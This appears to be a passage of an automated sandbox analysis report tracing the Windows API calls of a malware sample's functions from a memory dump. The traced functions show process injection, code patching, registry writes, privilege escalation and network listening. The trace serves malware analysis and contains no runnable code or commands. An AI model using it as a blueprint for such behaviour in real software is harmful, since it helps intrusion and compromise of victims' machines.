Part of subcall function 00CF40CB: CloseHandle.KERNEL32 ref: 00CF4144
Part of subcall function 00CF40CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00CF4154
Part of subcall function 00CF40CB: CloseHandle.KERNEL32(?), ref: 00CF415B
Part of subcall function 00CF40CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CF416C
Part of subcall function 00CF40CB: CloseHandle.KERNEL32 ref: 00CF4173

Process32NextW.KERNEL32(?,?), ref: 00CF42F3
CloseHandle.KERNEL32 ref: 00CF4306

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCB74D, Relevance: 16.0, APIs: 9, Instructions: 112

APIs

GetProcAddress.KERNEL32(?,?), ref: 00CCB76F
GetProcAddress.KERNEL32(?,?), ref: 00CCB791
GetProcAddress.KERNEL32(?,?), ref: 00CCB7AC
GetProcAddress.KERNEL32(?,?), ref: 00CCB7C7
GetProcAddress.KERNEL32(?,?), ref: 00CCB7E2
GetProcAddress.KERNEL32(?,?), ref: 00CCB7FD
GetProcAddress.KERNEL32(?,?), ref: 00CCB81C
GetProcAddress.KERNEL32(?,?), ref: 00CCB83B
GetProcAddress.KERNEL32(?,?), ref: 00CCB85A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEB0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 00CEB0DB
CommandLineToArgvW.SHELL32 ref: 00CEB0E2
StrCmpNW.SHLWAPI(?,00CC7F1C,00000002), ref: 00CEB108
LocalFree.KERNEL32 ref: 00CEB134

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00CEB171
memcpy.MSVCRT ref: 00CEB184

Part of subcall function 00CEF8BA: memcpy.MSVCRT ref: 00CEF8E7

UnmapViewOfFile.KERNEL32 ref: 00CEB1BD
CloseHandle.KERNEL32 ref: 00CEB1F9

Part of subcall function 00CEB562: memset.MSVCRT ref: 00CEB587
Part of subcall function 00CEB562: memcpy.MSVCRT ref: 00CEB5E7
Part of subcall function 00CEB562: memcpy.MSVCRT ref: 00CEB5FF
Part of subcall function 00CEB562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00CEB66A
Part of subcall function 00CEB562: memcpy.MSVCRT ref: 00CEB6A8

memcpy.MSVCRT ref: 00CEB1E0

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00CD9173

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

CloseHandle.KERNEL32 ref: 00CD9198
SetLastError.KERNEL32(00000008,?,?,?,?,00CE0646,?,?,?,?), ref: 00CD91A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00CD91BD
InternetReadFile.WININET(?,?,00001000,?), ref: 00CD91DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CD9210
FlushFileBuffers.KERNEL32 ref: 00CD9229

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CloseHandle.KERNEL32 ref: 00CD923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00CE0646,?,?,?,?), ref: 00CD9257

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCB392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00CF0741: CoInitializeEx.OLE32(00000000,00000000), ref: 00CF074E

Part of subcall function 00CD9F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00CCB41A,?), ref: 00CD9F69
Part of subcall function 00CD9F57: #2.OLEAUT32(00CCB41A,00000000,?,?,?,00CCB41A,?), ref: 00CD9F9D
Part of subcall function 00CD9F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CCB41A,?), ref: 00CD9FD2
Part of subcall function 00CD9F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00CD9FF2

#2.OLEAUT32(WQL,?), ref: 00CCB480
#2.OLEAUT32(?,?), ref: 00CCB49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 00CCB4CC
#9.OLEAUT32(?), ref: 00CCB53D

Part of subcall function 00CD9F2C: #6.OLEAUT32(?,00000000,00CCB574), ref: 00CD9F49
Part of subcall function 00CD9F2C: CoUninitialize.OLE32 ref: 00CF078C

memcpy.MSVCRT ref: 00CCB616
memcpy.MSVCRT ref: 00CCB628
memcpy.MSVCRT ref: 00CCB63A

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Strings

WQL, xrefs: 00CCB47B
displayName, xrefs: 00CCB50A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDE257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 00CD568C: TlsSetValue.KERNEL32(00000001,00CD638A), ref: 00CD5699

GetCurrentThread.KERNEL32 ref: 00CDE26F
SetThreadPriority.KERNEL32 ref: 00CDE276

Part of subcall function 00CEBEE3: CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CDE2C0

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Part of subcall function 00CDE22A: PathFindFileNameW.SHLWAPI(?), ref: 00CDE22E
Part of subcall function 00CDE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00CDE242
Part of subcall function 00CDE22A: CharUpperW.USER32(?,?,?,00CDE32B), ref: 00CDE24C

PathQuoteSpacesW.SHLWAPI(?), ref: 00CDE333

Part of subcall function 00CE4B8D: WaitForSingleObject.KERNEL32(00000000,00CD63B6), ref: 00CE4B95

WaitForSingleObject.KERNEL32 ref: 00CDE374
StrCmpW.SHLWAPI(?,?), ref: 00CDE3CE

Part of subcall function 00CE0D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00CE0D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00CDE42F

Part of subcall function 00CE0D19: RegFlushKey.ADVAPI32 ref: 00CE0D29
Part of subcall function 00CE0D19: RegCloseKey.ADVAPI32 ref: 00CE0D31

WaitForSingleObject.KERNEL32 ref: 00CDE450

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CDE2E2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE422E
LeaveCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE4261

Part of subcall function 00CDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00CDDEC9
Part of subcall function 00CDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00CDDED5
Part of subcall function 00CDDEBB: SetLastError.KERNEL32(00000001,00CE42C8,00D02954,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CDDEED

CoTaskMemFree.OLE32(00000000), ref: 00CE42F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CE431A

Strings

SHGetKnownFolderPath, xrefs: 00CE42B9
shell32.dll, xrefs: 00CE42BE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CC869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,00CD37D4,00000000,?), ref: 00CD3756

Part of subcall function 00CD6B09: memcmp.MSVCRT ref: 00CD6B29

GetCurrentThread.KERNEL32 ref: 00CD36AC
GetThreadPriority.KERNEL32 ref: 00CD36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00CD36C6
Sleep.KERNEL32(00000000), ref: 00CD36CA
memcpy.MSVCRT ref: 00CD36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00CD36EA
SetThreadPriority.KERNEL32 ref: 00CD36F2

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

GetTickCount.KERNEL32 ref: 00CD370D
GetTickCount.KERNEL32 ref: 00CD371A
Sleep.KERNEL32(00000000), ref: 00CD3727

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCBFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00CE5C6B: memset.MSVCRT ref: 00CE5C7A
Part of subcall function 00CE5C6B: memcpy.MSVCRT ref: 00CE5CA1

Part of subcall function 00CF0741: CoInitializeEx.OLE32(00000000,00000000), ref: 00CF074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00CCC08A
GetHandleInformation.KERNEL32(?,?), ref: 00CCC09C

Part of subcall function 00CF2755: EnterCriticalSection.KERNEL32(00D03510,?,00CF30AF,?,?,00000000), ref: 00CF2765
Part of subcall function 00CF2755: LeaveCriticalSection.KERNEL32(00D03510,?,00000000), ref: 00CF278F

socket.WS2_32(?,00000001,00000006), ref: 00CCC0CF
socket.WS2_32(?,00000002,00000011), ref: 00CCC0E0
closesocket.WS2_32(00000002), ref: 00CCC0FF
closesocket.WS2_32 ref: 00CCC106

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

memset.MSVCRT ref: 00CCC1C8

Part of subcall function 00CF2BF3: bind.WS2_32(?,00CF2CD1), ref: 00CF2C3A
Part of subcall function 00CF2BF3: listen.WS2_32(?,00000014), ref: 00CF2C4F
Part of subcall function 00CF2BF3: WSAGetLastError.WS2_32(00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF2C5D
Part of subcall function 00CF2BF3: WSASetLastError.WS2_32(?,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF2C6D

Part of subcall function 00CF2C7A: memset.MSVCRT ref: 00CF2C90
Part of subcall function 00CF2C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00CF2CD5

Part of subcall function 00CF2AB4: memset.MSVCRT ref: 00CF2AC9
Part of subcall function 00CF2AB4: getsockname.WS2_32(?,00CCC22C,?), ref: 00CF2ADC

Part of subcall function 00CCC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CCC404

memcpy.MSVCRT ref: 00CCC3C8

Part of subcall function 00CEBF3B: CoUninitialize.OLE32 ref: 00CF078C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF08D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00CF0909
getsockname.WS2_32(?,?,?), ref: 00CF0926
memcpy.MSVCRT ref: 00CF0949
memcpy.MSVCRT ref: 00CF0956
memcpy.MSVCRT ref: 00CF0976
memcpy.MSVCRT ref: 00CF0983
memset.MSVCRT ref: 00CF0993
memcpy.MSVCRT ref: 00CF09E3

Part of subcall function 00CD6BFF: send.WS2_32(?,?,00000015,00000000), ref: 00CD6C07

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 00CE439E
PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
memcpy.MSVCRT ref: 00CE43F1
memcpy.MSVCRT ref: 00CE441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 00CCE775
memcpy.MSVCRT ref: 00CCE78A
memcpy.MSVCRT ref: 00CCE79F
memcpy.MSVCRT ref: 00CCE7AE

Part of subcall function 00CCE301: EnterCriticalSection.KERNEL32(00D03510,?,00CCE5BF,?,00CCE617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 00CCE311
Part of subcall function 00CCE301: LeaveCriticalSection.KERNEL32(00D03510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,00CDBE0B,?,?,00000830), ref: 00CCE340

Part of subcall function 00CDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00CDDEC9
Part of subcall function 00CDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00CDDED5
Part of subcall function 00CDDEBB: SetLastError.KERNEL32(00000001,00CE42C8,00D02954,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CDDEED

SetFileTime.KERNEL32(?,?,?,?), ref: 00CCE813

Strings

SetFileInformationByHandle, xrefs: 00CCE7BD
kernel32.dll, xrefs: 00CCE7C2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 00CCE632
memcpy.MSVCRT ref: 00CCE645
memcpy.MSVCRT ref: 00CCE658
memcpy.MSVCRT ref: 00CCE663
GetFileTime.KERNEL32(?,?,?), ref: 00CCE687
memcpy.MSVCRT ref: 00CCE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CCE5F8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(00D03510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE305A
LeaveCriticalSection.KERNEL32(00D03510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE3084

Part of subcall function 00CE1215: memset.MSVCRT ref: 00CE122B
Part of subcall function 00CE1215: InitializeCriticalSection.KERNEL32(00D02910), ref: 00CE123B
Part of subcall function 00CE1215: memset.MSVCRT ref: 00CE126A
Part of subcall function 00CE1215: InitializeCriticalSection.KERNEL32(00D028F0), ref: 00CE1274

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Part of subcall function 00CF3DAE: memcpy.MSVCRT ref: 00CF3DE4

memcmp.MSVCRT ref: 00CE3175
memcmp.MSVCRT ref: 00CE31A6

Part of subcall function 00CF3D5A: memcpy.MSVCRT ref: 00CF3D94

EnterCriticalSection.KERNEL32(00D02910), ref: 00CE3219

Part of subcall function 00CE130C: GetTickCount.KERNEL32 ref: 00CE1313

Part of subcall function 00CE1723: EnterCriticalSection.KERNEL32(00D028F0,00D0292C,?,?,00D02910), ref: 00CE1736
Part of subcall function 00CE1723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE17E1
Part of subcall function 00CE1723: LeaveCriticalSection.KERNEL32(00D028F0,?,?,00D02910), ref: 00CE18CB

Part of subcall function 00CE198D: EnterCriticalSection.KERNEL32(00F527E8,?,?,?,?,00D02910), ref: 00CE1A67
Part of subcall function 00CE198D: LeaveCriticalSection.KERNEL32(00F527E8,000000FF,00000000,?,?,?,?,00D02910), ref: 00CE1A8F

LeaveCriticalSection.KERNEL32(00D02910,00D0292C,00D0292C,00D0292C), ref: 00CE3269

Part of subcall function 00CE5FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,00D0292C,?,?,00D02910,?,?,?,?,00CE3260,00D0292C), ref: 00CE5FD6

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Strings

!, xrefs: 00CE3187
!, xrefs: 00CE31AF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00CD9657
GetProcAddress.KERNEL32(?,?), ref: 00CD9685
GetProcAddress.KERNEL32(?,?), ref: 00CD969F
GetProcAddress.KERNEL32(?,?), ref: 00CD96BB
FreeLibrary.KERNEL32 ref: 00CD9769

Part of subcall function 00CD50C0: GetCurrentThread.KERNEL32 ref: 00CD50D4
Part of subcall function 00CD50C0: OpenThreadToken.ADVAPI32 ref: 00CD50DB
Part of subcall function 00CD50C0: GetCurrentProcess.KERNEL32 ref: 00CD50EB
Part of subcall function 00CD50C0: OpenProcessToken.ADVAPI32 ref: 00CD50F2
Part of subcall function 00CD50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00CD5113
Part of subcall function 00CD50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00CD5128
Part of subcall function 00CD50C0: GetLastError.KERNEL32 ref: 00CD5132
Part of subcall function 00CD50C0: CloseHandle.KERNEL32(00000001), ref: 00CD5143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00CD96E8

Part of subcall function 00CD95BE: EqualSid.ADVAPI32(?,5B867A00), ref: 00CD95E1
Part of subcall function 00CD95BE: CloseHandle.KERNEL32(00000001), ref: 00CD9628

Strings

SeTcbPrivilege, xrefs: 00CD96DE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 00CD6F50
FlushFileBuffers.KERNEL32 ref: 00CD7036

Part of subcall function 00CE44FB: FindFirstFileW.KERNEL32(?,?), ref: 00CE452C
Part of subcall function 00CE44FB: FindNextFileW.KERNEL32(?,?), ref: 00CE457E
Part of subcall function 00CE44FB: FindClose.KERNEL32 ref: 00CE4589
Part of subcall function 00CE44FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CE4595
Part of subcall function 00CE44FB: RemoveDirectoryW.KERNEL32(?), ref: 00CE459C

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD6F85

Part of subcall function 00CCE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00CCE376
Part of subcall function 00CCE35B: PathAddBackslashW.SHLWAPI(?), ref: 00CCE3A0
Part of subcall function 00CCE35B: CreateDirectoryW.KERNEL32(?), ref: 00CCE457
Part of subcall function 00CCE35B: SetFileAttributesW.KERNEL32(?), ref: 00CCE468
Part of subcall function 00CCE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00CCE481
Part of subcall function 00CCE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00CCE492

MoveFileExW.KERNEL32(?,?,00000001), ref: 00CD6FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00CD6FE5

Part of subcall function 00CCE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CCE594

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Sleep.KERNEL32(00001388), ref: 00CD7028

Strings

.tmp, xrefs: 00CD6F9C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE1051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(00D03510,?,?,00000000,00CE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00CE1067
LeaveCriticalSection.KERNEL32(00D03510,?,?,00000000,00CE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00CE108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00CE10AB
GetProcAddress.KERNEL32 ref: 00CE10B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 00CE10D4

Strings

RegDeleteKeyExW, xrefs: 00CE10A1
advapi32.dll, xrefs: 00CE10A6

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF40CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00CF40DC

Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4A89
Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4AC4
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B04
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B27
Part of subcall function 00CE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE4B77

CreateThread.KERNEL32(00000000,00000000,00CF40AB,?), ref: 00CF4132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CF413D
CloseHandle.KERNEL32 ref: 00CF4144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00CF4154
CloseHandle.KERNEL32(?), ref: 00CF415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CF416C
CloseHandle.KERNEL32 ref: 00CF4173

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF1474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00CF2A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00CF2A47

Part of subcall function 00CD6B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00CD6BC5
Part of subcall function 00CD6B66: recv.WS2_32(?,?,?,00000000), ref: 00CD6BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00CF154F
memcpy.MSVCRT ref: 00CF1587
FreeAddrInfoW.WS2_32(?), ref: 00CF1595
memset.MSVCRT ref: 00CF15B0

Part of subcall function 00CF13F4: getpeername.WS2_32(?,?,?), ref: 00CF1418
Part of subcall function 00CF13F4: getsockname.WS2_32(?,?,?), ref: 00CF1430
Part of subcall function 00CF13F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00CF1461

Part of subcall function 00CD6D02: socket.WS2_32(?,00000001,00000006), ref: 00CD6D0E
Part of subcall function 00CD6D02: bind.WS2_32 ref: 00CD6D2B
Part of subcall function 00CD6D02: listen.WS2_32(?,00000001), ref: 00CD6D38
Part of subcall function 00CD6D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00CF15FC,?,?,?), ref: 00CD6D42
Part of subcall function 00CD6D02: closesocket.WS2_32 ref: 00CD6D4B
Part of subcall function 00CD6D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00CF15FC,?,?,?), ref: 00CD6D52

Part of subcall function 00CD6EB5: accept.WS2_32(?,00000000,?), ref: 00CD6ED6

Part of subcall function 00CD6C17: socket.WS2_32(?,00000001,00000006), ref: 00CD6C23
Part of subcall function 00CD6C17: connect.WS2_32 ref: 00CD6C40
Part of subcall function 00CD6C17: closesocket.WS2_32 ref: 00CD6C4B

Part of subcall function 00CF304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00CF3061

Part of subcall function 00CD6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00CD6D88
Part of subcall function 00CD6D60: recv.WS2_32(?,?,00000400,00000000), ref: 00CD6DB4
Part of subcall function 00CD6D60: send.WS2_32(?,?,?,00000000), ref: 00CD6DD6
Part of subcall function 00CD6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00CD6E03

Part of subcall function 00CD6EE0: shutdown.WS2_32(?,00000002), ref: 00CD6EEB
Part of subcall function 00CD6EE0: closesocket.WS2_32 ref: 00CD6EF2

Strings

[, xrefs: 00CF15CD
[, xrefs: 00CF1609
[, xrefs: 00CF16E7
Z, xrefs: 00CF1700

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD3D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00CD3D5E
EnterCriticalSection.KERNEL32 ref: 00CD3D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00CD3DB8
GetTickCount.KERNEL32 ref: 00CD3DCB

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CED95F: GetSystemTime.KERNEL32(?), ref: 00CED969

Part of subcall function 00CCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CCCEB9

GetTickCount.KERNEL32 ref: 00CD3FC5

Part of subcall function 00CCF1EF: memcmp.MSVCRT ref: 00CCF1FB

Part of subcall function 00CCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCD70
Part of subcall function 00CCCD5A: memcpy.MSVCRT ref: 00CCCDCD
Part of subcall function 00CCCD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1,?,00000002), ref: 00CCCDDD
Part of subcall function 00CCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00CCCE11
Part of subcall function 00CCCD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCE9F

Part of subcall function 00CD3906: memset.MSVCRT ref: 00CD39D5
Part of subcall function 00CD3906: memcpy.MSVCRT ref: 00CD3A30
Part of subcall function 00CD3906: memcmp.MSVCRT ref: 00CD3AAB
Part of subcall function 00CD3906: memcpy.MSVCRT ref: 00CD3AFF
Part of subcall function 00CD3906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00CD3BD2
Part of subcall function 00CD3906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00CD3BF0

GetTickCount.KERNEL32 ref: 00CD3FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00CD4021

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
